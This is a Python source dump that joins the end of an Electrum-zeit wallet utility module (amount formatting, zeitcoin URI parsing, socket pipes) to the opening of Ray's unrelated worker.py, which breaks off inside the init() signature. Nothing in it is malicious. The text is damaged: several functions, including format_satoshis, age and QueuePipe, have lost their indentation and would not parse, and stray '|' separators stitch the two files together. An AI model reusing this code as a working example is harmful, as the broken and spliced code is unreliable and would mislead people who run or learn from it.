    """Path of the blockchain headers file (sandboxed location on Android)."""
    if 'ANDROID_DATA' in os.environ:
        return android_headers_path()
    return os.path.join(config.path, 'blockchain_headers')
def user_dir():
    """Return the per-user data directory for this platform, or None if no
    home-like environment variable is set."""
    env = os.environ
    if "HOME" in env:
        return os.path.join(env["HOME"], ".electrum-zeit")
    if "APPDATA" in env:
        return os.path.join(env["APPDATA"], "Electrum-zeit")
    if "LOCALAPPDATA" in env:
        return os.path.join(env["LOCALAPPDATA"], "Electrum-zeit")
    if 'ANDROID_DATA' in env:
        return android_check_data_dir()
    # No home directory found in environment variables; caller must cope with None.
    return
def format_satoshis_plain(x, decimal_point=8):
    """Render a satoshi amount as a plain decimal string.

    Always uses '.' as the decimal point, has no thousands separator, and
    strips trailing zeros (and the dot itself for whole amounts).
    """
    scaled = Decimal(x) / pow(10, decimal_point)
    text = "{:.8f}".format(scaled)
    return text.rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:n}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result.decode('utf8')
def timestamp_to_datetime(timestamp):
    """Convert a POSIX timestamp to a local datetime, or None on bad input.

    FIX: the except list replaces the original bare ``except:``, which also
    swallowed KeyboardInterrupt/SystemExit.
    """
    try:
        return datetime.fromtimestamp(timestamp)
    except (TypeError, ValueError, OverflowError, OSError):
        return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
    """Human-readable approximation of a timedelta ("5 minutes", "about 1 hour", ...)."""
    total_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
    total_minutes = int(round(total_seconds/60))
    if total_minutes <= 1:
        if not include_seconds:
            return "less than a minute" if total_minutes == 0 else "1 minute"
        for limit in (5, 10, 20):
            if total_seconds < limit:
                return "less than %s seconds" % limit
        if total_seconds < 40:
            return "half a minute"
        if total_seconds < 60:
            return "less than a minute"
        return "1 minute"
    if total_minutes < 45:
        return "%s minutes" % total_minutes
    if total_minutes < 90:
        return "about 1 hour"
    if total_minutes < 1440:
        return "about %d hours" % (round(total_minutes / 60.0))
    if total_minutes < 2880:
        return "1 day"
    if total_minutes < 43220:
        return "%d days" % (round(total_minutes / 1440))
    if total_minutes < 86400:
        return "about 1 month"
    if total_minutes < 525600:
        return "%d months" % (round(total_minutes / 43200))
    if total_minutes < 1051200:
        return "about 1 year"
    return "over %d years" % (round(total_minutes / 525600))
block_explorer_info = {
'cryptoid Chainz': ('https://chainz.cryptoid.info/zeit/',
{'tx': 'tx.dws?', 'addr': 'address.dws?'}),
'system default': ('https://chainz.cryptoid.info/zeit/',
{'tx': 'tx.dws?', 'addr': 'address.dws?'}),
}
def block_explorer(config):
    """Name of the user's configured block explorer (default: cryptoid Chainz)."""
    explorer_name = config.get('block_explorer', 'cryptoid Chainz')
    return explorer_name
def block_explorer_tuple(config):
return block_explorer_info.get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return "".join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
    """Parse a 'zeitcoin:' payment URI (BIP21-style) into a dict.

    Accepts either a bare address or a full URI. The returned dict may
    contain 'address', 'amount' (converted to satoshis), 'message'/'memo',
    'time', 'exp', 'sig', plus any other query keys verbatim. If the URI
    carries a payment request ('r', or 'name' together with 'sig'), it is
    fetched/decoded on a daemon thread and passed to the *on_pr* callback.
    NOTE(review): Python 2 code — relies on str.decode('utf8') and
    .encode('hex'); confirm before porting.
    """
    import bitcoin
    from bitcoin import COIN
    # No scheme separator at all: treat the input as a bare address.
    if ':' not in uri:
        if not bitcoin.is_address(uri):
            raise BaseException("Not a zeitcoin address")
        return {'address': uri}
    u = urlparse.urlparse(uri)
    if u.scheme != 'zeitcoin':
        raise BaseException("Not a zeitcoin URI")
    address = u.path
    # python for android fails to parse query
    if address.find('?') > 0:
        address, query = u.path.split('?')
        pq = urlparse.parse_qs(query)
    else:
        pq = urlparse.parse_qs(u.query)
    # Reject URIs in which any query key appears more than once.
    for k, v in pq.items():
        if len(v)!=1:
            raise Exception('Duplicate Key', k)
    out = {k: v[0] for k, v in pq.items()}
    if address:
        if not bitcoin.is_address(address):
            raise BaseException("Invalid zeitcoin address:" + address)
        out['address'] = address
    if 'amount' in out:
        # Amount is either plain decimal coins, or '<x>X<d>' where <d> is an
        # explicit decimal exponent relative to 10^8 (satoshis).
        am = out['amount']
        m = re.match('([0-9\.]+)X([0-9])', am)
        if m:
            k = int(m.group(2)) - 8
            amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
        else:
            amount = Decimal(am) * COIN
        out['amount'] = int(amount)
    if 'message' in out:
        out['message'] = out['message'].decode('utf8')
        out['memo'] = out['message']
    if 'time' in out:
        out['time'] = int(out['time'])
    if 'exp' in out:
        out['exp'] = int(out['exp'])
    if 'sig' in out:
        # Signature travels base58-encoded; store it as a hex string.
        out['sig'] = bitcoin.base_decode(out['sig'], None, base=58).encode('hex')
    r = out.get('r')
    sig = out.get('sig')
    name = out.get('name')
    if r or (name and sig):
        # Resolve the payment request off the calling thread, then hand the
        # result to the caller-supplied callback.
        def get_payment_request_thread():
            import paymentrequest as pr
            if name and sig:
                s = pr.serialize_request(out).SerializeToString()
                request = pr.PaymentRequest(s)
            else:
                request = pr.get_payment_request(r)
            on_pr(request)
        t = threading.Thread(target=get_payment_request_thread)
        t.setDaemon(True)
        t.start()
    return out
def create_URI(addr, amount, message):
    """Serialize (addr, amount, message) into a 'zeitcoin:' BIP21-style URI.

    *amount* is in satoshis; falsy amount/message fields are omitted.
    Returns "" when *addr* is not a valid address.
    """
    import bitcoin
    if not bitcoin.is_address(addr):
        return ""
    query = []
    if amount:
        query.append('amount=%s'%format_satoshis_plain(amount))
    if message:
        # Python 2: percent-encode a UTF-8 byte string, not a unicode object.
        if type(message) == unicode:
            message = message.encode('utf8')
        query.append('message=%s'%urllib.quote(message))
    p = urlparse.ParseResult(scheme='zeitcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
    return urlparse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
def raw_input(prompt=None):
    """Write *prompt* to stdout explicitly, then read a line via the builtin.

    Works around http://bugs.python.org/issue1927, where the prompt can end
    up on stderr instead of stdout on Unix systems.
    """
    if prompt:
        sys.stdout.write(prompt)
    line = builtin_raw_input()
    return line
# Keep a reference to the original builtin, then install the stdout-safe
# wrapper interpreter-wide (Python 2: the builtins module is `__builtin__`).
import __builtin__
builtin_raw_input = __builtin__.raw_input
__builtin__.raw_input = raw_input
def parse_json(message):
    """Split one newline-terminated JSON value off the front of *message*.

    Args:
        message: the raw receive buffer.
    Returns:
        A tuple (obj, rest): *obj* is the decoded first line, or None when
        the buffer holds no complete line yet or the line is not valid JSON;
        *rest* is the unconsumed remainder of the buffer.
    """
    n = message.find('\n')
    if n == -1:
        # No complete line buffered yet.
        return None, message
    try:
        j = json.loads(message[0:n])
    except Exception:
        # Was a bare `except:`, which also swallowed KeyboardInterrupt /
        # SystemExit; narrowed. Malformed JSON still yields None.
        j = None
    return j, message[n+1:]
class timeout(Exception):
    """Raised by the pipe classes when no complete message arrives in time."""
    pass
import socket
import errno
import json
import ssl
import time
class SocketPipe:
    """Newline-delimited JSON message pipe over a (possibly SSL) socket.

    NOTE(review): Python 2 syntax (`except socket.error, err:`); behavior
    preserved as-is.
    """
    def __init__(self, socket):
        self.socket = socket
        # Buffer of raw bytes received but not yet parsed into a message.
        self.message = ''
        self.set_timeout(0.1)
        # Timestamp of the last successful recv, used for idle detection.
        self.recv_time = time.time()
    def set_timeout(self, t):
        self.socket.settimeout(t)
    def idle_time(self):
        """Seconds elapsed since data was last received."""
        return time.time() - self.recv_time
    def get(self):
        """Return the next decoded JSON message.

        Raises `timeout` when no complete message is available in time;
        returns None when the remote side closed the connection.
        """
        while True:
            response, self.message = parse_json(self.message)
            if response is not None:
                return response
            try:
                data = self.socket.recv(1024)
            except socket.timeout:
                raise timeout
            except ssl.SSLError:
                raise timeout
            except socket.error, err:
                if err.errno == 60:
                    # ETIMEDOUT (BSD/macOS).
                    raise timeout
                elif err.errno in [11, 35, 10035]:
                    # EAGAIN / EWOULDBLOCK / WSAEWOULDBLOCK: transient.
                    print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
                    time.sleep(0.2)
                    raise timeout
                else:
                    print_error("pipe: socket error", err)
                    data = ''
            except:
                traceback.print_exc(file=sys.stderr)
                data = ''
            if not data:  # Connection closed remotely
                return None
            self.message += data
            self.recv_time = time.time()
    def send(self, request):
        """Serialize one request and send it."""
        out = json.dumps(request) + '\n'
        self._send(out)
    def send_all(self, requests):
        """Serialize a batch of requests and send them in a single write."""
        out = ''.join(map(lambda x: json.dumps(x) + '\n', requests))
        self._send(out)
    def _send(self, out):
        # Keep writing until the whole buffer is flushed, retrying on
        # transient SSL/socket conditions; re-raise anything unexpected.
        while out:
            try:
                sent = self.socket.send(out)
                out = out[sent:]
            except ssl.SSLError as e:
                print_error("SSLError:", e)
                time.sleep(0.1)
                continue
            except socket.error as e:
                if e[0] in (errno.EWOULDBLOCK,errno.EAGAIN):
                    print_error("EAGAIN: retrying")
                    time.sleep(0.1)
                    continue
                elif e[0] in ['timed out', 'The write operation timed out']:
                    print_error("socket timeout, retry")
                    time.sleep(0.1)
                    continue
                else:
                    traceback.print_exc(file=sys.stdout)
                    raise e
import Queue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else Queue.Queue()
self.get_queue = get_queue if get_queue else Queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except Queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except Queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
class StoreDict(dict):
    """A dict persisted as pretty-printed JSON at <config.path>/<name>.

    Every mutation made through __setitem__ / pop is flushed to disk
    immediately.
    """
    def __init__(self, config, name):
        self.config = config
        self.path = os.path.join(self.config.path, name)
        self.load()
    def load(self):
        """Populate self from the backing file; start empty if unreadable."""
        try:
            with open(self.path, 'r') as f:
                self.update(json.loads(f.read()))
        except Exception:
            # Was a bare `except:` (also caught KeyboardInterrupt); narrowed.
            # Missing or corrupt file is deliberately best-effort: start empty.
            pass
    def save(self):
        """Rewrite the backing file with the current contents."""
        with open(self.path, 'w') as f:
            f.write(json.dumps(self, indent=4, sort_keys=True))
    def __setitem__(self, key, value):
        dict.__setitem__(self, key, value)
        self.save()
    def pop(self, key):
        """Remove *key* if present and persist; missing keys are ignored."""
        if key in self:  # was `key in self.keys()`: same result, no temp list
            dict.pop(self, key)
            self.save()
def check_www_dir(rdir):
    """Ensure *rdir* exists and holds the static web assets.

    Copies the bundled index.html on first run and downloads the jquery /
    qrcode assets that are not shipped with the source. Requires network
    access for missing files (Python 2 urllib API).
    """
    import urllib, urlparse, shutil, os
    if not os.path.exists(rdir):
        os.mkdir(rdir)
    index = os.path.join(rdir, 'index.html')
    if not os.path.exists(index):
        print_error("copying index.html")
        src = os.path.join(os.path.dirname(__file__), 'www', 'index.html')
        shutil.copy(src, index)
    files = [
        "https://code.jquery.com/jquery-1.9.1.min.js",
        "https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js",
        "https://code.jquery.com/ui/1.10.3/jquery-ui.js",
        "https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css"
    ]
    for URL in files:
        # Derive the local filename from the URL path; fetch only once.
        path = urlparse.urlsplit(URL).path
        filename = os.path.basename(path)
        path = os.path.join(rdir, filename)
        if not os.path.exists(path):
            print_error("downloading ", URL)
            urllib.urlretrieve(URL, path)
|
worker.py | from contextlib import contextmanager
import atexit
import faulthandler
import hashlib
import inspect
import io
import json
import logging
import os
import redis
import sys
import threading
import time
import traceback
from typing import Any, Callable, Dict, Iterator, List, Optional, Tuple, Union
# Ray modules
from ray.autoscaler._private.constants import AUTOSCALER_EVENTS
from ray.autoscaler._private.util import DEBUG_AUTOSCALING_ERROR
import ray.cloudpickle as pickle
import ray._private.memory_monitor as memory_monitor
import ray.node
import ray.job_config
import ray._private.parameter
import ray.ray_constants as ray_constants
import ray.remote_function
import ray.serialization as serialization
import ray._private.gcs_utils as gcs_utils
import ray._private.services as services
from ray._private.gcs_pubsub import gcs_pubsub_enabled, GcsPublisher, \
GcsSubscriber
from ray._private.runtime_env.py_modules import upload_py_modules_if_needed
from ray._private.runtime_env.working_dir import upload_working_dir_if_needed
from ray._private.runtime_env.constants import RAY_JOB_CONFIG_JSON_ENV_VAR
import ray._private.import_thread as import_thread
from ray.util.tracing.tracing_helper import import_from_string
from ray.util.annotations import PublicAPI, DeveloperAPI, Deprecated
from ray.util.debug import log_once
import ray
import colorama
import setproctitle
import ray.state
from ray import (
ActorID,
JobID,
ObjectRef,
Language,
)
import ray._private.profiling as profiling
from ray.exceptions import (
RaySystemError,
RayError,
RayTaskError,
ObjectStoreFullError,
)
from ray._private.function_manager import FunctionActorManager
from ray._private.ray_logging import setup_logger
from ray._private.ray_logging import global_worker_stdstream_dispatcher
from ray._private.utils import check_oversized_function
from ray.util.inspect import is_cython
from ray.experimental.internal_kv import _internal_kv_get, \
_internal_kv_initialized, _initialize_internal_kv, \
_internal_kv_reset
from ray._private.client_mode_hook import client_mode_hook
# Worker process modes: drivers run in SCRIPT_MODE (or LOCAL_MODE for serial
# debugging); regular workers run in WORKER_MODE; spill/restore workers handle
# moving objects to/from external storage.
SCRIPT_MODE = 0
WORKER_MODE = 1
LOCAL_MODE = 2
SPILL_WORKER_MODE = 3
RESTORE_WORKER_MODE = 4
# Redis key prefix under which error messages are stored.
ERROR_KEY_PREFIX = b"Error:"
# Logger for this module. It should be configured at the entry point
# into the program using Ray. Ray provides a default configuration at
# entry/init points.
logger = logging.getLogger(__name__)
# Visible for testing.
def _unhandled_error_handler(e: Exception):
    """Log an error that no caller retrieved (visible for testing)."""
    text = ("Unhandled error (suppress with "
            "RAY_IGNORE_UNHANDLED_ERRORS=1): {}".format(e))
    logger.error(text)
class Worker:
    """A class used to define the control flow of a worker process.
    Note:
        The methods in this class are considered unexposed to the user. The
        functions outside of this class are considered exposed.
    Attributes:
        node (ray.node.Node): The node this worker is attached to.
        mode: The mode of the worker. One of SCRIPT_MODE, LOCAL_MODE, and
            WORKER_MODE.
        cached_functions_to_run (List): A list of functions to run on all of
            the workers that should be exported as soon as connect is called.
    """
    def __init__(self):
        """Initialize a Worker object."""
        self.node = None
        self.mode = None
        self.cached_functions_to_run = []
        # Actor instances hosted by this worker process.
        self.actors = {}
        # When the worker is constructed. Record the original value of the
        # CUDA_VISIBLE_DEVICES environment variable.
        self.original_gpu_ids = ray._private.utils.get_cuda_visible_devices()
        self.memory_monitor = memory_monitor.MemoryMonitor()
        # A dictionary that maps from driver id to SerializationContext
        # TODO: clean up the SerializationContext once the job finished.
        self.serialization_context_map = {}
        self.function_actor_manager = FunctionActorManager(self)
        # This event is checked regularly by all of the threads so that they
        # know when to exit.
        self.threads_stopped = threading.Event()
        # Index of the current session. This number will
        # increment every time when `ray.shutdown` is called.
        self._session_index = 0
        # If this is set, the next .remote call should drop into the
        # debugger, at the specified breakpoint ID.
        self.debugger_breakpoint = b""
        # If this is set, ray.get calls invoked on the object ID returned
        # by the worker should drop into the debugger at the specified
        # breakpoint ID.
        self.debugger_get_breakpoint = b""
        # If True, make the debugger external to the node this worker is
        # running on.
        self.ray_debugger_external = False
        self._load_code_from_local = False
        # Used to toggle whether or not logs should be filtered to only those
        # produced in the same job.
        self.filter_logs_by_job = True
    @property
    def connected(self):
        """bool: True if Ray has been started and False otherwise."""
        return self.node is not None
    @property
    def node_ip_address(self):
        self.check_connected()
        return self.node.node_ip_address
    @property
    def load_code_from_local(self):
        self.check_connected()
        return self._load_code_from_local
    @property
    def current_job_id(self):
        # `core_worker` only exists after connecting; fall back to a nil ID.
        if hasattr(self, "core_worker"):
            return self.core_worker.get_current_job_id()
        return JobID.nil()
    @property
    def actor_id(self):
        if hasattr(self, "core_worker"):
            return self.core_worker.get_actor_id()
        return ActorID.nil()
    @property
    def current_task_id(self):
        return self.core_worker.get_current_task_id()
    @property
    def current_node_id(self):
        return self.core_worker.get_current_node_id()
    @property
    def namespace(self):
        return self.core_worker.get_job_config().ray_namespace
    @property
    def placement_group_id(self):
        return self.core_worker.get_placement_group_id()
    @property
    def worker_id(self):
        return self.core_worker.get_worker_id().binary()
    @property
    def should_capture_child_tasks_in_placement_group(self):
        return self.core_worker.should_capture_child_tasks_in_placement_group()
    @property
    def current_session_and_job(self):
        """Get the current session index and job id as pair."""
        assert isinstance(self._session_index, int)
        assert isinstance(self.current_job_id, ray.JobID)
        return self._session_index, self.current_job_id
    @property
    def runtime_env(self):
        """Get the runtime env in json format"""
        return self.core_worker.get_current_runtime_env()
    def get_serialization_context(self, job_id=None):
        """Get the SerializationContext of the job that this worker is processing.
        Args:
            job_id: The ID of the job that indicates which job to get
                the serialization context for.
        Returns:
            The serialization context of the given job.
        """
        # This function needs to be protected by a lock, because it will be
        # called by`register_class_for_serialization`, as well as the import
        # thread, from different threads. Also, this function will recursively
        # call itself, so we use RLock here.
        if job_id is None:
            job_id = self.current_job_id
        with self.lock:
            if job_id not in self.serialization_context_map:
                self.serialization_context_map[
                    job_id] = serialization.SerializationContext(self)
            return self.serialization_context_map[job_id]
    def check_connected(self):
        """Check if the worker is connected.
        Raises:
            Exception: An exception is raised if the worker is not connected.
        """
        if not self.connected:
            raise RaySystemError("Ray has not been started yet. You can "
                                 "start Ray with 'ray.init()'.")
    def set_mode(self, mode):
        """Set the mode of the worker.
        The mode SCRIPT_MODE should be used if this Worker is a driver that is
        being run as a Python script or interactively in a shell. It will print
        information about task failures.
        The mode WORKER_MODE should be used if this Worker is not a driver. It
        will not print information about tasks.
        The mode LOCAL_MODE should be used if this Worker is a driver and if
        you want to run the driver in a manner equivalent to serial Python for
        debugging purposes. It will not send remote function calls to the
        scheduler and will instead execute them in a blocking fashion.
        Args:
            mode: One of SCRIPT_MODE, WORKER_MODE, and LOCAL_MODE.
        """
        self.mode = mode
    def set_load_code_from_local(self, load_code_from_local):
        self._load_code_from_local = load_code_from_local
    def put_object(self, value, object_ref=None, owner_address=None):
        """Put value in the local object store with object reference `object_ref`.
        This assumes that the value for `object_ref` has not yet been placed in
        the local object store. If the plasma store is full, the worker will
        automatically retry up to DEFAULT_PUT_OBJECT_RETRIES times. Each
        retry will delay for an exponentially doubling amount of time,
        starting with DEFAULT_PUT_OBJECT_DELAY. After this, exception
        will be raised.
        Args:
            value: The value to put in the object store.
            object_ref (ObjectRef): The object ref of the value to be
                put. If None, one will be generated.
            owner_address: The serialized address of object's owner.
        Returns:
            ObjectRef: The object ref the object was put under.
        Raises:
            ray.exceptions.ObjectStoreFullError: This is raised if the attempt
                to store the object fails because the object store is full even
                after multiple retries.
        """
        # Make sure that the value is not an object ref.
        if isinstance(value, ObjectRef):
            raise TypeError(
                "Calling 'put' on an ray.ObjectRef is not allowed "
                "(similarly, returning an ray.ObjectRef from a remote "
                "function is not allowed). If you really want to "
                "do this, you can wrap the ray.ObjectRef in a list and "
                "call 'put' on it (or return it).")
        if self.mode == LOCAL_MODE:
            assert object_ref is None, ("Local Mode does not support "
                                        "inserting with an ObjectRef")
        serialized_value = self.get_serialization_context().serialize(value)
        # This *must* be the first place that we construct this python
        # ObjectRef because an entry with 0 local references is created when
        # the object is Put() in the core worker, expecting that this python
        # reference will be created. If another reference is created and
        # removed before this one, it will corrupt the state in the
        # reference counter.
        return ray.ObjectRef(
            self.core_worker.put_serialized_object(
                serialized_value,
                object_ref=object_ref,
                owner_address=owner_address),
            # If the owner address is set, then the initial reference is
            # already acquired internally in CoreWorker::CreateOwned.
            # TODO(ekl) we should unify the code path more with the others
            # to avoid this special case.
            skip_adding_local_ref=(owner_address is not None))
    def raise_errors(self, data_metadata_pairs, object_refs):
        # Deserialize the error payloads and surface each through the
        # unhandled-error handler unless suppressed via the environment.
        out = self.deserialize_objects(data_metadata_pairs, object_refs)
        if "RAY_IGNORE_UNHANDLED_ERRORS" in os.environ:
            return
        for e in out:
            _unhandled_error_handler(e)
    def deserialize_objects(self, data_metadata_pairs, object_refs):
        # Function actor manager or the import thread may call pickle.loads
        # at the same time which can lead to failed imports
        # TODO: We may be better off locking on all imports or injecting a lock
        # into pickle.loads (https://github.com/ray-project/ray/issues/16304)
        with self.function_actor_manager.lock:
            context = self.get_serialization_context()
            return context.deserialize_objects(data_metadata_pairs,
                                               object_refs)
    def get_objects(self, object_refs, timeout=None):
        """Get the values in the object store associated with the IDs.
        Return the values from the local object store for object_refs. This
        will block until all the values for object_refs have been written to
        the local object store.
        Args:
            object_refs (List[object_ref.ObjectRef]): A list of the object refs
                whose values should be retrieved.
            timeout (float): timeout (float): The maximum amount of time in
                seconds to wait before returning.
        Returns:
            list: List of deserialized objects
            bytes: UUID of the debugger breakpoint we should drop
                into or b"" if there is no breakpoint.
        """
        # Make sure that the values are object refs.
        for object_ref in object_refs:
            if not isinstance(object_ref, ObjectRef):
                raise TypeError(
                    f"Attempting to call `get` on the value {object_ref}, "
                    "which is not an ray.ObjectRef.")
        # A falsy timeout (None or 0) means wait indefinitely (-1).
        timeout_ms = int(timeout * 1000) if timeout else -1
        data_metadata_pairs = self.core_worker.get_objects(
            object_refs, self.current_task_id, timeout_ms)
        debugger_breakpoint = b""
        for (data, metadata) in data_metadata_pairs:
            if metadata:
                # Metadata is a comma-separated byte string; the second field
                # may carry a debugger breakpoint ID.
                metadata_fields = metadata.split(b",")
                if len(metadata_fields) >= 2 and metadata_fields[1].startswith(
                        ray_constants.OBJECT_METADATA_DEBUG_PREFIX):
                    debugger_breakpoint = metadata_fields[1][len(
                        ray_constants.OBJECT_METADATA_DEBUG_PREFIX):]
        return self.deserialize_objects(data_metadata_pairs,
                                        object_refs), debugger_breakpoint
    def run_function_on_all_workers(self, function):
        """Run arbitrary code on all of the workers.
        This function will first be run on the driver, and then it will be
        exported to all of the workers to be run. It will also be run on any
        new workers that register later. If ray.init has not been called yet,
        then cache the function and export it later.
        Args:
            function (Callable): The function to run on all of the workers. It
                takes only one argument, a worker info dict. If it returns
                anything, its return values will not be used.
        """
        # If ray.init has not been called yet, then cache the function and
        # export it when connect is called. Otherwise, run the function on all
        # workers.
        if self.mode is None:
            self.cached_functions_to_run.append(function)
        else:
            # Attempt to pickle the function before we need it. This could
            # fail, and it is more convenient if the failure happens before we
            # actually run the function locally.
            pickled_function = pickle.dumps(function)
            function_to_run_id = hashlib.shake_128(pickled_function).digest(
                ray_constants.ID_SIZE)
            key = b"FunctionsToRun:" + function_to_run_id
            # First run the function on the driver.
            # We always run the task locally.
            function({"worker": self})
            # Check if the function has already been put into redis.
            function_exported = self.redis_client.setnx(b"Lock:" + key, 1)
            if not function_exported:
                # In this case, the function has already been exported, so
                # we don't need to export it again.
                return
            check_oversized_function(pickled_function, function.__name__,
                                     "function", self)
            # Run the function on all workers.
            self.redis_client.hset(
                key,
                mapping={
                    "job_id": self.current_job_id.binary(),
                    "function_id": function_to_run_id,
                    "function": pickled_function,
                })
            self.redis_client.rpush("Exports", key)
            # TODO(rkn): If the worker fails after it calls setnx and before it
            # successfully completes the hset and rpush, then the program will
            # most likely hang. This could be fixed by making these three
            # operations into a transaction (or by implementing a custom
            # command that does all three things).
    def main_loop(self):
        """The main loop a worker runs to receive and execute tasks."""
        def sigterm_handler(signum, frame):
            # Shut down cleanly before the process is killed.
            shutdown(True)
            sys.exit(1)
        ray._private.utils.set_sigterm_handler(sigterm_handler)
        self.core_worker.run_task_loop()
        sys.exit(0)
    def print_logs(self):
        """Prints log messages from workers on all nodes in the same job.
        """
        pubsub_client = self.redis_client.pubsub(
            ignore_subscribe_messages=True)
        pubsub_client.subscribe(gcs_utils.LOG_FILE_CHANNEL)
        localhost = services.get_node_ip_address()
        try:
            # Keep track of the number of consecutive log messages that have
            # been received with no break in between. If this number grows
            # continually, then the worker is probably not able to process the
            # log messages as rapidly as they are coming in.
            num_consecutive_messages_received = 0
            job_id_binary = ray._private.utils.binary_to_hex(
                self.current_job_id.binary())
            while True:
                # Exit if we received a signal that we should stop.
                if self.threads_stopped.is_set():
                    return
                msg = pubsub_client.get_message()
                if msg is None:
                    num_consecutive_messages_received = 0
                    self.threads_stopped.wait(timeout=0.01)
                    continue
                num_consecutive_messages_received += 1
                if (num_consecutive_messages_received % 100 == 0
                        and num_consecutive_messages_received > 0):
                    logger.warning(
                        "The driver may not be able to keep up with the "
                        "stdout/stderr of the workers. To avoid forwarding "
                        "logs to the driver, use "
                        "'ray.init(log_to_driver=False)'.")
                data = json.loads(ray._private.utils.decode(msg["data"]))
                # Don't show logs from other drivers.
                if (self.filter_logs_by_job and data["job"]
                        and job_id_binary != data["job"]):
                    continue
                data["localhost"] = localhost
                global_worker_stdstream_dispatcher.emit(data)
        except (OSError, redis.exceptions.ConnectionError) as e:
            logger.error(f"print_logs: {e}")
        finally:
            # Close the pubsub client to avoid leaking file descriptors.
            pubsub_client.close()
@PublicAPI
@client_mode_hook(auto_init=True)
def get_gpu_ids():
    """Get the IDs of the GPUs that are available to the worker.
    If the CUDA_VISIBLE_DEVICES environment variable was set when the worker
    started up, then the IDs returned by this method will be a subset of the
    IDs in CUDA_VISIBLE_DEVICES. If not, the IDs will fall in the range
    [0, NUM_GPUS - 1], where NUM_GPUS is the number of GPUs that the node has.
    Returns:
        A list of GPU IDs.
    """
    worker = global_worker
    worker.check_connected()
    if worker.mode != WORKER_MODE:
        # NOTE(review): this path only warns and still falls through to the
        # computation below — it does not early-return an empty list.
        if log_once("worker_get_gpu_ids_empty_from_driver"):
            logger.warning(
                "`ray.get_gpu_ids()` will always return the empty list when "
                "called from the driver. This is because Ray does not manage "
                "GPU allocations to the driver process.")
    # TODO(ilr) Handle inserting resources in local mode
    all_resource_ids = global_worker.core_worker.resource_ids()
    assigned_ids = set()
    for resource, assignment in all_resource_ids.items():
        # Handle both normal and placement group GPU resources.
        # Note: We should only get the GPU ids from the placement
        # group resource that does not contain the bundle index!
        import re
        if resource == "GPU" or re.match(r"^GPU_group_[0-9A-Za-z]+$",
                                         resource):
            for resource_id, _ in assignment:
                assigned_ids.add(resource_id)
    assigned_ids = list(assigned_ids)
    # If the user had already set CUDA_VISIBLE_DEVICES, then respect that (in
    # the sense that only GPU IDs that appear in CUDA_VISIBLE_DEVICES should be
    # returned).
    if global_worker.original_gpu_ids is not None:
        assigned_ids = [
            global_worker.original_gpu_ids[gpu_id] for gpu_id in assigned_ids
        ]
    # Give all GPUs in local_mode.
    if global_worker.mode == LOCAL_MODE:
        max_gpus = global_worker.node.get_resource_spec().num_gpus
        assigned_ids = global_worker.original_gpu_ids[:max_gpus]
    return assigned_ids
@Deprecated
def get_resource_ids():
    """Return the resource IDs assigned to this worker.

    Returns:
        Dict mapping each resource name to a list of (resource_id, fraction)
        pairs reserved for this worker.
    """
    w = global_worker
    w.check_connected()
    if _mode() == LOCAL_MODE:
        raise RuntimeError(
            "ray.worker.get_resource_ids() currently does not work in "
            "local_mode.")
    return w.core_worker.resource_ids()
@Deprecated
def get_dashboard_url():
    """Return the URL of the Ray dashboard as a string.

    The URL does not identify which node hosts the dashboard.
    """
    active_worker = global_worker
    active_worker.check_connected()
    return _global_node.webui_url
# Process-wide singletons used by the module-level API functions.
global_worker = Worker()
"""Worker: The global Worker object for this worker process.
We use a global Worker object to ensure that there is a single worker object
per worker process.
"""
_global_node = None
"""ray.node.Node: The global node object that is created by ray.init()."""
@PublicAPI
@client_mode_hook(auto_init=False)
def init(
address: Optional[str] = None,
*,
num_cpus: Optional[int] = None,
num_gpus: Optional[int] = None,
resources: Optional[Dict[str, float]] = None,
object_store_memory: Optional[int] = None,
local_mode: bool = False,
ignore_reinit_error: bool = False,
include_dashboard: Optional[bool] = None,
dashboard_host: str = ray_constants.DEFAULT_DASHBOARD_IP,
dashboard_port: Optional[int] = None,
job_config: "ray.job_config.JobConfig" = None,
configure_logging: bool = True,
logging_level: int = ray_constants.LOGGER_LEVEL,
logging_format: str = ray_constants.LOGGER_FORMAT,
log_to_driver: bool = True,
namespace: Optional[str] = None,
runtime_env: Dict[str, Any] = None,
# The following are unstable parameters and their use is discouraged.
_enable_object_reconstruction: bool = False,
